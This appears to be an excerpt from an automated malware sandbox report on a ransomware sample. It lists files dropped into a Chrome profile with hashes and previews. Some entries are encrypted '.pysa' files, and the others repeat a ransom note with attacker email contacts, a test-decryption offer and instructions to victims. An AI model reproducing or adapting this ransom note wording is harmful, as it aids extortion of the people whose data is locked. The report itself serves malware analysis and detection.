                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):21504
                  Entropy (8bit):7.918201227691724
                  Encrypted:false
                  SSDEEP:384:5QjqVeo+AvrfjRKuhQ5dnuGIDXf+hUY8hsNu3LG+KtNOiyRQ14Xt1rI:5QjPo+Av7jQYQ5U+hUx3LULWG4d10
                  MD5:5258F21EEF2377C241FD4846C5EA7675
                  SHA1:F493332D63AEB188CEC03876B5E7013BA9AE1AAB
                  SHA-256:167BD42E01C8566B9AE01434D624874393095F7B509ACEB5C16E5D1299687D8D
                  SHA-512:8255FE04581F85BC02E05B2FD1E2516982AE69A2274DE792ACAAA4FDCB6A9B38A288B5F22C585E2982356CB6C51A6AEF93F1280ACF94F0DF82FF35A8D91C582E
                  Malicious:false
                  Preview: ..........*...P..r.L....p..v..k../..*.>.!m).V..h|.oJ.........g..\EdC.81.'..'..T...U.Age..>.4..._.......y..7.c...N+q.-.._.9.................*u.7..0...d..A......*...Oi.fA..,G{.1,.p...+.r0..L/|b..@....t(C....S..>_T.f...z...!...00.K&.)<..P.,)....ZA...f.1.x..n.....Y....m.(.......z...u.Nmg=e......p&..;...+........d..a.9..Tr...ZH$.....L....bF.e..+i..F......'...,...A.-......e....r:./....6.|...`3+`.y.d.dV..%4...4.f.d|!.....b..]m.p,pK%..nM.R)....Xu....RP~-J......H...nC.=X...s3S.xp..............s;.I|X........]..-\.wt...Q`.S.k(.F.T.>........q_..aR.....cB\FH.C].O.2.7.<oj&....tO71.".....!.=J.... ..v.% /....^.JM.m^.o.........}.R.Ji+ ....s......."P.....2S..3.Vp...|8.F>.F..43..u......t.K.?..j..V....M........P...........`.lw"dyO.....GE..5..C1.....6.1...x......S:...,@..J-.S@ .2s...Q.c...d...N.TN..P.....,0..../.!.+..4.7......J.;q# .FT.4K......... ..W...{_... bdP.....b.....#.}..#.=0.GiN.......g.~.F.*.j.J..&WGlAo7.....x{...ld..w...m..vV2..6........Gj!...7.5.1+
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\TransportSecurity.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.039803852266376
                  Encrypted:false
                  SSDEEP:48:84wwGB4VFhjjIiJUvM6LOzviKeBcsxy+aQu0XJ9DvWDxuwjZ7MyhdJH+srF8Oo10:84uB4VFhIOajOTfsxRJ9DvUB1My1+yFD
                  MD5:73373D7A2EE4400B9E5D0819E3CA5107
                  SHA1:412CB742815B21FB4963E9B74FA050A5200D29C4
                  SHA-256:C1D29CF38AA39246121E866259ABBDDB1CDE2415A2F4D123C4F699607DD7B7E6
                  SHA-512:5F7A1A7E8FB54789E1DF2A96C017F079979A94C493C4A28661A711EFBE5E335A3DDFBBA3911D5BD57632F91E133ADFBBD4FBCB845FC7FFDA529B694C92757E83
                  Malicious:false
                  Preview: s.(..7Bf<.....z.~MQ..P..Q.>.}..n..*...`.C_[.A...G..pi..)...f...j..W...`..D...kUO"......5.r...9fQ.'....K..D..U.7?3M...^..O.....7Y..D.Y..S ..v.>...W..bl.f..^+......).bF..^g..)....y....3.TA9..3c..Y..wH..8!...#)....N.I........T .D..?d..ry..b.l..*.....3.....~[..M....`..b.}..\..k. u.#\.pQZ...=oQ....@_.qAN....U.....A..g8.M....p..*.WH.m`..lN.6na.U...?3.XicY.I.0!......".........c.4'M.>..|....*..q...<W..a.h......dH.~ZP.C....qpf$..Db..kKM$c..3.....#P.t.a.U.....kZsP`.W.:.=...L.GZ.........5"....U*.........##..:.ix#Qm.O|.g.A.-)q..0..+..CI......q1.e..O./.S$.h54.cUq@5.0..)|1.F.2.@. ...`.d.Z.%..Z...l5'..|;.....to.m.0.N...&3....x.m...q.....$;8>...h..9R...s....g}..._*F0.>9$....j<'3.FK|...*S.v...zK".............;8};.....v......lm..R..j........d}..2...o"...p....&2F;....p.C.._] 3..>r..P....}x.`....iaG.<....V.7..!....i.xe:.o_..H....iyD{...5..9....gI.}....+.m.].6......{.._.....1...Nfe.....).4C...3.g..z.I....k.G."p.'#...t.<...2:j.x........f....s..XU~...17.f.eqN.
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Visited Links.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.994847270512666
                  Encrypted:true
                  SSDEEP:1536:8VCxcwxSTMd5k2c5JTS/4y2XT3xhygHbpAlKeHP0Q63puWlk9y0I5d+N22:RNdPc7W/pcGQUKy1MuWxP+z
                  MD5:C85383BFFC62203059C2E80442DD3026
                  SHA1:8EA8C715E537044E5754C7ECA76DC3CDD19DB8CC
                  SHA-256:6566714B919A6316A88E3C25A833BB0C19906F9B54761889BC4CC75B15CE772F
                  SHA-512:CD3E159FDDBBEF9EB688377D03F30A8D8036D199F79FD00FC18F202F395A8835A4218F95C001C65DBB00D84121C0F62039DAF62DE45427B97F4870180F399389
                  Malicious:true
                  Preview: ..}AM. mm.J.f..).....?'v..#.V...\..'<4...6.Ie......l.kS.Ft..s...1.P.1...F..0?...l.X...c.....q.3..=...o..p......Cm...$.z.`.d...../.....1...]5H....X.q{:[.......@.......C'...,.!.W.r..x..`...$..~{*E....F.(..x.TC.........j.R...M......T.m..0<..j...%..1bt..k.:S..-.....E..qWR..;>p2e.F.;.Z..%...r......,.^\q.-_.(U.1....'..,.....M.........aiG....p92...p..tY.(m...nDT....>.......b..u....B?...u..$...R'M]..d..h...f...^._.noZ4..'L.....Q..}#....0I.....=../...+.7..z...m0..C^....\....e.....K@.y.!t..;]R...D.o`I?....o:...WA...%..G.W.-.m#.CY{..5.......4.ar`/.T.././........A.4.K...Q.....HM....F.Oj8`......7.G.....M.....T..^...1....C".Y...S....+....-.8.E(...$#1..@.9..08....._...<.$}vd.d.T.Jib.......A..h.....a...MJ..C........$1.LG..J.f.x.........@vs<.....9.".:..{..D......K.2...........T.s...,a./j.mBs.!.......v..2.5..;...A...v.,.J.........?.Z...n......U..-R.....J._....5..~....J5.t.Ml.'.L.... .mi&..#3.ShE9.......r.....1.....m.rm.:(.u".gPW.S-.z...VV.%
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):74752
                  Entropy (8bit):7.990984270922171
                  Encrypted:true
                  SSDEEP:1536:FVajUSYGb8BUYlEzTVlOJVpAd5YqiPEUARpQjTQZdI8n6XJcqxdDs5:FVaRYGb8OYlEzcpNnnARpQj0LRn6XSqU
                  MD5:A34DFF854202C0C4CC42CE76004DA484
                  SHA1:FA066EB929BFD1D7F439B07972C3780896F209F5
                  SHA-256:8FF357BA0FBE7DAC78A69DE88E0D47B7B33301ED33903FDC8FF126AF982C841F
                  SHA-512:D914B661B9A352C4170E700F15189D39E9B32AA1FC490D9DCB166D03788BDD415A1F6698017BF046A1BE94F8B0EE5B21852AE67C4AB6F798DD49F9ECAB1918E3
                  Malicious:true
                  Preview: N........h...ae.&?.".......Q...]...E..Tdt.J..K.`j..!...9+.0.r..1..edF.......m}.+.......|e..do.$..,.......c2vQ.-W|...J/].`.&/..2.........p..c..g+.O.6.L.O..r(.i... ...L"R:G.{n..e..R.H.q.ujLfE\.}N......^.{...1....].vE0.I9....;!..Y>..'...........j>.!..H.4o[.tOP;...@T.C.w..K..fy2J...V.T.,.......'..-..L...y.....:.PBI...hx..+9.....h.I./.[...Y.n....Ym.?...D[..a\.so1.(..n.....n...u)....i..z........m.J..XT[..x.Zt...K..}@.HR.86,.`U.Ecf...(.i..hn...&S.K.j....za.........{,..g.j..v..=.A.s..t...z...<...W.......)..-...p...$o...\.\.v..$.o....}.B/t...>..T.e..P...][.Zd......HD@N......J....^o..BX.s.mHeI......M.G...[BL:T.p.%./y.|..,KS3..J=..3]......B..8S..!..k..w.a.#.].%.z../.M.....<.!C...z.}j...7e.o._...J.j.'.....N..!...<..#..@.c.b....B>d>..H9:MD..S.>h.#..nev..WX..\f..T....$....T.p.e...../..2.<..<.s.:.!.fp.._'.;.7..E....Ve)S.....J.^..&..9.c}.s..o.....7_.5.Jq?.:..&..6.!.O.c.......x...".1.|.v.@..y..x..1.A.).`W.iz.t........%..e.....t|JY..aaN.s..nf........f.U%.
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\e868dd9b-f73d-43ab-8047-36e4bd92d922\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):17408
                  Entropy (8bit):7.884246250663821
                  Encrypted:false
                  SSDEEP:384:q/52Z3QikB3zh2B5xa8dNmtN52o8NmeX/pPygr:7rkdzgoNk9gY9ygr
                  MD5:EA1470737CE9A3F8834E15BEA235C22F
                  SHA1:D492ED318FF20F4A12B4BD1A448916E2E8F9ED52
                  SHA-256:519E38204B419381C5207A9C88229509EB12F6D71C55C1AB0AA4459FBB99ED2C
                  SHA-512:F02A4767D39A788433E15859F47240FBD035954C282461A909B6BBB120FBF41FB3239E9957972A866177E48A6A62B81B96A5968B658338E8EBF21B423941DD50
                  Malicious:false
                  Preview: ..a..C...+..a.S.rG..8mj8C...C...Mv_.....;<....]l..O#$..B..X9..O{.\Q... "#P<..a...D.Hi......z..PZ".........F....Av..W..n.V..2V..U.{XM[).....9.KU.L.C....1..LX....qL.^..@..j.$*..h........O....;.:.F.;./..."..e....C...2...I..=.}7..wms.?..PO..k.$...K.].5#....b...f..Bu.$.....J.....B..g..:d.n..4m.@^.b!M.C.Ru.....qY.............~.....[...%..{....y.j. ...^*H...#..*.j$...c...*^...p..@..I.u.[.0..Iu......./....;/...>7..K`....,.<..M....h.....:..L.Fi..D@.....d.=E..n.q...E...i.Y.;Yn.i.fm...k.,.0[.x.._(.-.......Li~...D..s...@....iWR.....s}$oK1iq....d..@.V._.p...@....*D;..`..Lo.;.....w.....I.7`I.!..w.......Zq..I~....l..x.IB.Ol..:....z...+....[...F..#....y.C......bU....oYM.#/...kD....$5m..nQ...:.7....^.....,.Y,.# iS..~o.,.il1.b.u..`...C^.e..4%..<.-.A.v.[_..d.E.8.p~p../.....eL..]...^.....$..pu|...n&.g..:...rZg[.S..0!...B..n+.Y}..3.6K.dd.F.e..q.....k.J..9j(#ZO#....Y....7Xk.V....BP...Q.u..s..]/.(ZZCr.|.K..N<..<....L.l.\x.....%.R....T..K$.....jN....4.X.
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\previews_opt_out.db.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):17408
                  Entropy (8bit):7.885908149930665
                  Encrypted:false
                  SSDEEP:384:XDsIIdWd+YRkF+CRKtM9yq1ZMG4euMyKlSADR92qdczHfU9LUleJ:XDsIdhGFhRaUnMG4euylJR92zILU8
                  MD5:C8C6EBD70B0DBDE963FED7E2D592102B
                  SHA1:4F8E124B0C752AE48CA769658BEA09B7CD8D90CB
                  SHA-256:4E160229692CA04F32211E112D96F3A0DCE52DFAB40CD3951A5002FDDCE8EAB4
                  SHA-512:755AEB9D1CB82354965DAB13285C4804DB9031E3DF882A1E5A880C915A565797103B42C3D3811FEE93BA65E737DBB33B715288D83E0B0532A1B51A321EB4EE0C
                  Malicious:false
